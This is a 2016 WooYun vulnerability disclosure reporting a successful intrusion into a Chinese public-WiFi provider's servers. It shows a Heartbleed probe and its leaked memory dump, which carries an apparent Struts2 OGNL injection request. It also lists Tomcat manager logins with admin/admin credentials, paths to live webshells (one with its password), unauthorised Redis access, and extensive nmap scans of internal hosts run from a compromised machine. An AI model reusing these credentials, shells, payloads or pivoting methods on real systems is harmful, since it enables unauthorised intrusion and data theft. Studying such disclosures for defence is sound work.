当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196654

漏洞标题:wifi安全之E路wifi多服务器多种漏洞打包(多系统Getshell/涉及公交终端设备信息/影响大量内网主机安全)

相关厂商:北京一路热点

漏洞作者: 管管侠

提交时间:2016-04-15 22:50

修复时间:2016-05-31 00:10

公开时间:2016-05-31 00:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-16: 厂商已经确认,细节仅向厂商公开
2016-04-26: 细节向核心白帽子及相关领域专家公开
2016-05-06: 细节向普通白帽子公开
2016-05-16: 细节向实习白帽子公开
2016-05-31: 细节向公众公开

简要描述:

千疮百孔,一堆堆的shell

详细说明:

主站openssl心脏滴血+tomcat弱口令+大量redis未授权访问
给出3个webshell
1.主站openssl心脏滴血

python openssl.py **.**.**.**


0000: 02 FF FF 08 03 00 53 48 73 F0 7C CA C1 D9 02 04  ......SHs.|.....
  0010: F2 1D 2D 49 F5 12 BF 40 1B 94 D9 93 E4 C4 F4 F0  ..-I...@........
  0020: D0 42 CD 44 A2 59 00 02 96 00 00 00 01 00 02 00  .B.D.Y..........
  0060: 1B 00 1C 00 1D 00 1E 00 1F 00 20 00 21 00 22 00  .......... .!.".
  0070: 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2A 00  #.$.%.&.'.(.).*.
  0080: 2B 00 2C 00 2D 00 2E 00 2F 00 30 00 31 00 32 00  +.,.-.../.0.1.2.
  0090: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3A 00  **.**.**.**.7.8.9.:.
  00a0: 3B 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 42 00  ;.<.=.>.?.@.A.B.
  00b0: 43 00 44 00 45 00 46 00 60 00 61 00 62 00 63 00  C.D.E.F.`.a.b.c.
  00c0: 64 00 65 00 66 00 67 00 68 00 69 00 6A 00 6B 00  d.e.f.g.h.i.j.k.
  00d0: 6C 00 6D 00 80 00 81 00 82 00 83 00 84 00 85 00  l.m.............
  01a0: 20 C0 21 C0 22 C0 23 C0 24 C0 25 C0 26 C0 27 C0   .!.".#.$.%.&.'.
  01b0: 28 C0 29 C0 2A C0 2B C0 2C C0 2D C0 2E C0 2F C0  (.).*.+.,.-.../.
  01c0: 30 C0 31 C0 32 C0 33 C0 34 C0 35 C0 36 C0 37 C0  0.1.2.**.**.**.**.7.
  01d0: 38 C0 39 C0 3A C0 3B C0 3C C0 3D C0 3E C0 3F C0  8.9.:.;.<.=.>.?.
  01e0: 40 C0 41 C0 42 C0 43 C0 44 C0 45 C0 46 C0 47 C0  @.A.B.C.D.E.F.G.
  01f0: 48 C0 49 C0 4A C0 4B C0 4C C0 4D C0 4E C0 4F C0  H.I.J.K.L.M.N.O.
  0200: 50 C0 51 C0 52 C0 53 C0 54 C0 55 C0 56 C0 57 C0  P.Q.R.S.T.U.V.W.
  0210: 58 C0 59 C0 5A C0 5B C0 5C C0 5D C0 5E C0 5F C0  X.Y.Z.[.\.].^._.
  0220: 60 C0 61 C0 62 C0 63 C0 64 C0 65 C0 66 C0 67 C0  `.a.b.c.d.e.f.g.
  0230: 68 C0 69 C0 6A C0 6B C0 6C C0 6D C0 6E C0 6F C0  h.i.j.k.l.m.n.o.
  0240: 70 C0 71 C0 72 C0 73 C0 74 C0 75 C0 76 C0 77 C0  p.q.r.s.t.u.v.w.
  0250: 78 C0 79 C0 7A C0 7B C0 7C C0 7D C0 7E C0 7F C0  x.y.z.{.|.}.~...
  02c0: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  02d0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  0300: 10 00 11 00 23 00 00 00 0F 00 01 01 25 32 37 25  ....#.......%27%
  0310: 32 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53  2b%27tcher.HttpS
  0320: 65 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52  er%27%2b%27vletR
  0330: 65 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65  es%27%2b%27ponse
  0340: 25 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72  %27%29.getWriter
  0350: 25 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E  %28%29,%23w.prin
  0360: 74 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62  tln%28%27[%27%2b
  0370: 25 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25  %27ok%27%2b%27]%
  0380: 32 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68  27%29,%23w.flush
  0390: 25 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73  %28%29,%23w.clos
  03a0: 65 25 32 38 25 32 39 7D 20 48 54 54 50 2F 31 2E  e%28%29} HTTP/1.
  03b0: 31 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  1..Accept-Encodi
  03c0: 6E 67 3A 20 69 64 65 6E 74 69 74 79 0D 0A 52 65  ng: identity..Re
  03d0: 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F 77  ferer: https://w
  03e0: 77 77 2E 31 36 77 69 66 69 2E 63 6F 6D 3F 72 65  **.**.**.**?re
  03f0: 64 69 72 65 63 74 3A 25 32 35 7B 25 32 37 5B 25  direct:%25{%27[%
  0400: 32 37 25 32 62 25 32 37 6F 6B 25 32 37 25 32 62  27%2b%27ok%27%2b
  0410: 25 32 37 5D 25 32 37 7D 25 32 32 2C 25 32 32 72  %27]%27}%22,%22r
  0420: 65 64 69 72 65 63 74 41 63 74 69 6F 6E 3A 25 32  edirectAction:%2
  0430: 35 7B 25 32 37 5B 25 32 37 25 32 62 25 32 37 6F  5{%27[%27%2b%27o
  0440: 6B 25 32 37 25 32 62 25 32 37 5D 25 32 37 7D 25  k%27%2b%27]%27}%
  0450: 32 32 2C 25 32 32 61 63 74 69 6F 6E 3A 25 32 35  22,%22action:%25
  0460: 7B 25 32 37 5B 25 32 37 25 32 62 25 32 37 6F 6B  {%27[%27%2b%27ok
  0470: 31 25 32 37 25 32 62 25 32 37 5D 25 32 37 7D 25  1%27%2b%27]%27}%
  0480: 32 32 2C 25 32 32 72 65 64 69 72 65 63 74 3A 24  22,%22redirect:$
  0490: 7B 25 32 33 77 25 33 64 25 32 33 63 6F 6E 74 65  {%23w%3d%23conte
  04a0: 78 74 2E 67 65 74 25 32 38 25 32 37 63 25 32 37  xt.get%28%27c%27
  04b0: 25 32 62 25 32 37 6F 6D 2E 6F 70 65 6E 73 25 32  %2b%27om.opens%2
  04c0: 37 25 32 62 25 32 37 79 6D 70 68 6F 6E 79 2E 78  7%2b%27ymphony.x
  04d0: 77 25 32 37 25 32 62 25 32 37 6F 72 6B 32 2E 64  w%27%2b%27ork2.d
  04e0: 69 73 70 61 25 32 37 25 32 62 25 32 37 74 63 68  ispa%27%2b%27tch
  04f0: 65 72 2E 48 74 74 70 53 65 72 25 32 37 25 32 62  er.HttpSer%27%2b
  0500: 25 32 37 76 6C 65 74 52 65 73 25 32 37 25 32 62  %27vletRes%27%2b
  0510: 25 32 37 70 6F 6E 73 65 25 32 37 25 32 39 2E 67  %27ponse%27%29.g
  0520: 65 74 57 72 69 74 65 72 25 32 38 25 32 39 2C 25  etWriter%28%29,%
  0530: 32 33 77 2E 70 72 69 6E 74 6C 6E 25 32 38 25 32  23w.println%28%2
  0540: 37 5B 25 32 37 25 32 62 25 32 37 6F 6B 25 32 37  7[%27%2b%27ok%27
  0550: 25 32 62 25 32 37 5D 25 32 37 25 32 39 2C 25 32  %2b%27]%27%29,%2
  0560: 33 77 2E 66 6C 75 73 68 25 32 38 25 32 39 2C 25  3w.flush%28%29,%
  0570: 32 33 77 2E 63 6C 6F 73 65 25 32 38 25 32 39 7D  23w.close%28%29}
  0580: 25 32 32 2C 25 32 32 72 65 64 69 72 65 63 74 41  %22,%22redirectA
  0590: 63 74 69 6F 6E 3A 24 7B 25 32 33 77 25 33 64 25  ction:${%23w%3d%
  05a0: 32 33 63 6F 6E 74 65 78 74 2E 67 65 74 25 32 38  23context.get%28
  05b0: 25 32 37 63 25 32 37 25 32 62 25 32 37 6F 6D 2E  %27c%27%2b%27om.
  05c0: 6F 70 65 6E 73 25 32 37 25 32 62 25 32 37 79 6D  opens%27%2b%27ym
  05d0: 70 68 6F 6E 79 2E 78 77 25 32 37 25 32 62 25 32  phony.xw%27%2b%2
  05e0: 37 6F 72 6B 32 2E 64 69 73 70 61 25 32 37 25 32  7ork2.dispa%27%2
  05f0: 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53 65  b%27tcher.HttpSe
  0600: 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52 65  r%27%2b%27vletRe
  0610: 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65 25  s%27%2b%27ponse%
  0620: 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72 25  27%29.getWriter%
  0630: 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E 74  28%29,%23w.print
  0640: 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62 25  ln%28%27[%27%2b%
  0650: 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25 32  27ok%27%2b%27]%2
  0660: 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68 25  7%29,%23w.flush%
  0670: 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73 65  28%29,%23w.close
  0680: 25 32 38 25 32 39 7D 25 32 32 2C 25 32 32 61 63  %28%29}%22,%22ac
  0690: 74 69 6F 6E 3A 25 32 35 7B 25 32 33 77 25 33 64  tion:%25{%23w%3d
  06a0: 25 32 33 63 6F 6E 74 65 78 74 2E 67 65 74 25 32  %23context.get%2
  06b0: 38 25 32 37 63 25 32 37 25 32 62 25 32 37 6F 6D  8%27c%27%2b%27om
  06c0: 2E 6F 70 65 6E 73 25 32 37 25 32 62 25 32 37 79  .opens%27%2b%27y
  06d0: 6D 70 68 6F 6E 79 2E 78 77 25 32 37 25 32 62 25  mphony.xw%27%2b%
  06e0: 32 37 6F 72 6B 32 2E 64 69 73 70 61 25 32 37 25  27ork2.dispa%27%
  06f0: 32 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53  2b%27tcher.HttpS
  0700: 65 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52  er%27%2b%27vletR
  0710: 65 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65  es%27%2b%27ponse
  0720: 25 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72  %27%29.getWriter
  0730: 25 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E  %28%29,%23w.prin
  0740: 74 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62  tln%28%27[%27%2b
  0750: 25 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25  %27ok%27%2b%27]%
  0760: 32 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68  27%29,%23w.flush
  0770: 25 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73  %28%29,%23w.clos
  0780: 65 25 32 38 25 32 39 7D 0D 0A 48 6F 73 74 3A 20  e%28%29}..Host: 
  0790: 77 77 77 2E 31 36 77 69 66 69 2E 63 6F 6D 0D 0A  **.**.**.**..
  07a0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A  Accept-Language:
  07b0: 20 65 6E 2D 75 73 3B 71 3D 30 2E 35 2C 65 6E 3B   en-us;q=0.5,en;
  07c0: 71 3D 30 2E 33 0D 0A 43 6F 6E 6E 65 63 74 69 6F  q=0.3..Connectio
  07d0: 6E 3A 20 63 6C 6F 73 65 0D 0A 55 73 65 72 2D 41  n: close..User-A
  07e0: 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E  gent: Mozilla/5.
  07f0: 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E  0 (Windows NT 6.
  0800: 31 3B 20 57 4F 57 36 34 3B 20 72 76 3A 32 31 2E  1; WOW64; rv:21.
  0810: 30 29 20 47 65 63 6B 6F 2F 32 30 31 30 30 31 30  0) Gecko/2010010
  0820: 31 20 46 69 72 65 66 6F 78 2F 32 31 2E 30 20 4E  1 Firefox/21.0 N
  0830: 67 53 70 69 64 65 72 2F 32 35 38 0D 0A 0D 0A A9  gSpider/258.....

漏洞证明:

2.两处tomcat弱口令导致getshell
http://**.**.**.**:2348/manager/html
http://**.**.**.**:6118/manager/html
这两个端口对应两台内网服务器分别是:**.**.**.**\**.**.**.**
密码都是admin/admin
发现都被前人搞过,我是发现即提交,好几处shell,请自查
shell地址:
http://**.**.**.**:2348/app/app1.jsp
http://**.**.**.**:6118/iswins/index.jsp

0.png

1.png

2.png

3.png

4.png

5.png

6.png

7.png


3.好多redis未授权访问,可shell
shell一个为例:**.**.**.**:8080/redis.php 密码:c
涉及ip
**.**.**.**:7001~4
**.**.**.**:6381
**.**.**.**:7963
**.**.**.**:6380
**.**.**.**:7963
**.**.**.**:7963
**.**.**.**:8063
**.**.**.**:8063
**.**.**.**:8063

a0.png

a1.png

a2.png

a3.png

a4.png

a5.png

a6.png

a7.png


有了shell,前面服务器装了nmap,简单检测开了哪些服务

[/home/Qica1/project/]$ nmap **.**.**.**-255
Starting Nmap 5.51 ( http://**.**.**.** ) at 2016-04-14 17:28 CST
Nmap scan report for bogon (**.**.**.**)
Host is up (0.000092s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: E0:DB:55:01:B3:BC (Unknown)
Nmap scan report for **.**.**.**
Host is up (0.000091s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 90:B1:1C:03:53:27 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.00021s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
2049/tcp open  nfs
8082/tcp open  blackice-alerts
MAC Address: 90:B1:1C:03:95:E2 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: D4:AE:52:B1:05:7C (Unknown)
Nmap scan report for **.**.**.**
Host is up (0.00011s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: D4:AE:52:B1:05:7C (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.00011s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
873/tcp  open  rsync
3306/tcp open  mysql
8081/tcp open  blackice-icecap
MAC Address: 90:B1:1C:01:6E:08 (Unknown)
Nmap scan report for **.**.**.** (**.**.**.**)
Host is up (0.00010s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
873/tcp  open  rsync
3306/tcp open  mysql
8009/tcp open  ajp13
MAC Address: 90:B1:1C:03:76:2F (Unknown)
Nmap scan report for localhost (**.**.**.**)
Host is up (0.000019s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
443/tcp  open  https
2049/tcp open  nfs
3306/tcp open  mysql
3690/tcp open  svn
8009/tcp open  ajp13
Nmap scan report for **.**.**.**
Host is up (0.00012s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
81/tcp    open  hosts2-ns
111/tcp   open  rpcbind
443/tcp   open  https
873/tcp   open  rsync
2049/tcp  open  nfs
8888/tcp  open  sun-answerbook
54328/tcp open  unknown
MAC Address: 70:E2:84:08:28:15 (Unknown)
Nmap scan report for **.**.**.**0
Host is up (0.000093s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8083/tcp open  us-srv
MAC Address: 70:E2:84:08:28:39 (Unknown)
Nmap scan report for **.**.**.**1
Host is up (0.00012s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
8083/tcp open  us-srv
8086/tcp open  d-s-n
9011/tcp open  unknown
MAC Address: 90:B1:1C:03:4C:66 (Unknown)
Nmap scan report for bogon (**.**.**.**2)
Host is up (0.000089s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
111/tcp  open  rpcbind
3306/tcp open  mysql
8082/tcp open  blackice-alerts
MAC Address: 90:B1:1C:03:C4:AC (Unknown)
Nmap scan report for **.**.**.**3
Host is up (0.000084s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-term-serv
5800/tcp  open  vnc-http
5900/tcp  open  vnc
8083/tcp  open  us-srv
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 90:B1:1C:01:78:D9 (Unknown)
Nmap scan report for bogon (**.**.**.**4)
Host is up (0.000080s latency).
Not shown: 979 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1030/tcp  open  iad1
1119/tcp  open  bnetgame
1433/tcp  open  ms-sql-s
3306/tcp  open  mysql
3389/tcp  open  ms-term-serv
4004/tcp  open  pxc-roid
5003/tcp  open  filemaker
5633/tcp  open  beorl
5800/tcp  open  vnc-http
5900/tcp  open  vnc
6101/tcp  open  backupexec
6106/tcp  open  isdninfo
10000/tcp open  snet-sensor-mgmt
MAC Address: 90:B1:1C:04:FC:D7 (Unknown)
Nmap scan report for bogon (**.**.**.**5)
Host is up (0.00015s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
7000/tcp  open  afs3-fileserver
8000/tcp  open  http-alt
8010/tcp  open  xmpp
55055/tcp open  unknown
MAC Address: D4:AE:52:E6:77:08 (Unknown)
Nmap scan report for **.**.**.**6
Host is up (0.00016s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: D4:AE:52:E6:75:3D (Unknown)
Nmap scan report for bogon (**.**.**.**1)
Host is up (0.000096s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
3306/tcp open  mysql
8088/tcp open  radan-http
MAC Address: C8:1F:66:ED:E7:EB (Unknown)
Nmap scan report for bogon (**.**.**.**2)
Host is up (0.00011s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
8009/tcp open  ajp13
8088/tcp open  radan-http
MAC Address: C8:1F:66:EE:0F:2F (Unknown)
Nmap scan report for **.**.**.**4
Host is up (0.00013s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
873/tcp  open  rsync
2049/tcp open  nfs
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
9090/tcp open  zeus-admin
MAC Address: 90:B1:1C:04:FC:EF (Unknown)
Nmap scan report for bogon (**.**.**.**5)
Host is up (0.00015s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
81/tcp    open  hosts2-ns
82/tcp    open  xfer
111/tcp   open  rpcbind
2049/tcp  open  nfs
49156/tcp open  unknown
MAC Address: 90:B1:1C:01:78:1C (Unknown)
Nmap scan report for bogon (**.**.**.**6)
Host is up (0.00013s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
81/tcp  open  hosts2-ns
82/tcp  open  xfer
111/tcp open  rpcbind
MAC Address: C8:1F:66:ED:F3:51 (Unknown)
Nmap scan report for **.**.**.**4
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:23:E9:37:8C:05 (F5 Networks)
Nmap scan report for bogon (**.**.**.**5)
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:01:D7:EF:1A:C5 (F5 Networks)
Nmap scan report for bogon (**.**.**.**6)
Host is up (0.00014s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:23:E9:37:8C:05 (F5 Networks)
Nmap scan report for **.**.**.**7
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
111/tcp  open  rpcbind
3000/tcp open  ppp
8333/tcp open  unknown
MAC Address: 14:18:77:53:E0:AD (Unknown)
Nmap scan report for bogon (**.**.**.**9)
Host is up (0.00016s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: F8:0F:41:FA:D2:B1 (Wistron InfoComm(ZhongShan))
Nmap scan report for **.**.**.**
Host is up (0.000095s latency).
Not shown: 985 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
7001/tcp open  afs3-callback
7002/tcp open  afs3-prserver
7004/tcp open  afs3-kaserver
8010/tcp open  xmpp
8011/tcp open  unknown
8083/tcp open  us-srv
8090/tcp open  unknown
9001/tcp open  tor-orport
9002/tcp open  dynamid
9011/tcp open  unknown
MAC Address: C8:1F:66:E3:83:A8 (Unknown)
Nmap scan report for **.**.**.**02
Host is up (0.00018s latency).
Not shown: 995 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
80/tcp   open   http
7000/tcp open   afs3-fileserver
MAC Address: C8:1F:66:E5:77:5D (Unknown)
Nmap scan report for bogon (**.**.**.**03)
Host is up (0.00012s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
90/tcp   open  dnsix
111/tcp  open  rpcbind
3306/tcp open  mysql
8009/tcp open  ajp13
MAC Address: C8:1F:66:E3:B9:19 (Unknown)
Nmap scan report for bogon (**.**.**.**51)
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE
80/tcp filtered http
81/tcp open     hosts2-ns
MAC Address: 00:01:D7:EF:1A:C5 (F5 Networks)
Nmap scan report for **.**.**.**48
Host is up (0.000093s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1021/tcp  open  exp1
1099/tcp  open  rmiregistry
3389/tcp  open  ms-term-serv
8888/tcp  open  sun-answerbook
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49160/tcp open  unknown
49175/tcp open  unknown
MAC Address: C8:1F:66:CF:53:C2 (Unknown)
Nmap scan report for bogon (**.**.**.**49)
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
443/tcp open  https
MAC Address: 00:0B:AB:53:FE:43 (Advantech Technology (china) Co.)
Nmap scan report for bogon (**.**.**.**50)
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp open     telnet
MAC Address: 70:7B:E8:C5:6E:A8 (Unknown)
Nmap scan report for **.**.**.**54
Host is up (0.00019s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
23/tcp   open  telnet
9999/tcp open  abyss
MAC Address: 00:E0:4C:11:16:6B (Realtek Semiconductor)
[/]$ nmap **.**.**.**-255
Starting Nmap 5.51 ( http://**.**.**.** ) at 2016-04-15 13:45 CST
Nmap scan report for bogon (**.**.**.**)
Host is up (0.000080s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: E0:DB:55:01:B3:BD (Unknown)
Nmap scan report for **.**.**.**
Host is up (0.000080s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 90:B1:1C:03:53:28 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.000074s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
2049/tcp open  nfs
8082/tcp open  blackice-alerts
MAC Address: 90:B1:1C:03:95:E3 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: D4:AE:52:B1:05:7D (Unknown)
Nmap scan report for **.**.**.**
Host is up (0.000099s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
873/tcp  open  rsync
3306/tcp open  mysql
8081/tcp open  blackice-icecap
MAC Address: 90:B1:1C:01:6E:09 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.000093s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
873/tcp  open  rsync
3306/tcp open  mysql
8009/tcp open  ajp13
MAC Address: 90:B1:1C:03:76:30 (Unknown)
Nmap scan report for bogon (**.**.**.**)
Host is up (0.000015s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
443/tcp  open  https
2049/tcp open  nfs
3306/tcp open  mysql
3690/tcp open  svn
8009/tcp open  ajp13
Nmap scan report for bogon (**.**.**.**)
Host is up (0.00010s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
81/tcp    open  hosts2-ns
111/tcp   open  rpcbind
443/tcp   open  https
873/tcp   open  rsync
2049/tcp  open  nfs
8888/tcp  open  sun-answerbook
54328/tcp open  unknown
MAC Address: 70:E2:84:08:28:16 (Unknown)
Nmap scan report for **.**.**.**0
Host is up (0.000073s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8083/tcp open  us-srv
MAC Address: 70:E2:84:08:28:3A (Unknown)
Nmap scan report for **.**.**.**1
Host is up (0.00012s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
8083/tcp open  us-srv
8086/tcp open  d-s-n
9011/tcp open  unknown
MAC Address: 90:B1:1C:03:4C:67 (Unknown)
Nmap scan report for **.**.**.**2
Host is up (0.00012s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
111/tcp  open  rpcbind
3306/tcp open  mysql
8082/tcp open  blackice-alerts
MAC Address: 90:B1:1C:03:C4:AD (Unknown)
Nmap scan report for **.**.**.**3
Host is up (0.000087s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-term-serv
5800/tcp  open  vnc-http
5900/tcp  open  vnc
